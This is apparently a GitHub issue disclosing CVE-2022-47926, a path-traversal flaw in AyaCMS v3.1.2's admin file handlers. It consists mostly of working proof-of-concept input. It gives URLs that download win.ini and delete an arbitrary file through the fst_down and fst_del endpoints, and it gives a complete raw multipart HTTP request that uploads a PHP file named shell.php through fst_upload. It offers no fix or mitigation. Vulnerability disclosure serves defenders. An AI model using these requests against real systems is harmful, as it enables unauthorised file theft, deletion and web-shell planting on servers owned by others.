CVE-2022-47926: AyaCMS v3.1.2 has Arbitrary file operations Vulnerability · Issue #7 · loadream/AyaCMS

Vulnerability files: /aya/module/admin/fst_down.inc.php, /aya/module/admin/fst_del.inc.php
Vulnerability description: The check_path function has flaws in the filtering of parameters passed in by $file. We only need to enter characters other than “./\” such as aya in the header of the parameter to bypass the detection and download or delete any file in the system.
1、Arbitrary file download Vulnerability

You can access any file in the system through
admin.php?action=fst_down&file=aya/table/…/…/…/…/…/…/windows/win.ini

2、Arbitrary file delete Vulnerability

First I create a file named 111.txt under C:\Windows

Then the files can be deleted through
admin.php?action=fst_del&file=aya/…/…/…/…/…/windows/111.txt&in_ajax=1

3、Arbitrary file upload Vulnerability

POST /upload/admin.php?action=fst_upload&file=aya HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 204
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9HCWsLRL4AuZwHyu
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundary9HCWsLRL4AuZwHyu
Content-Disposition: form-data; name="upfile"; filename="shell.php"
Content-Type: text/plain

<?php phpinfo(); ?>
------WebKitFormBoundary9HCWsLRL4AuZwHyu--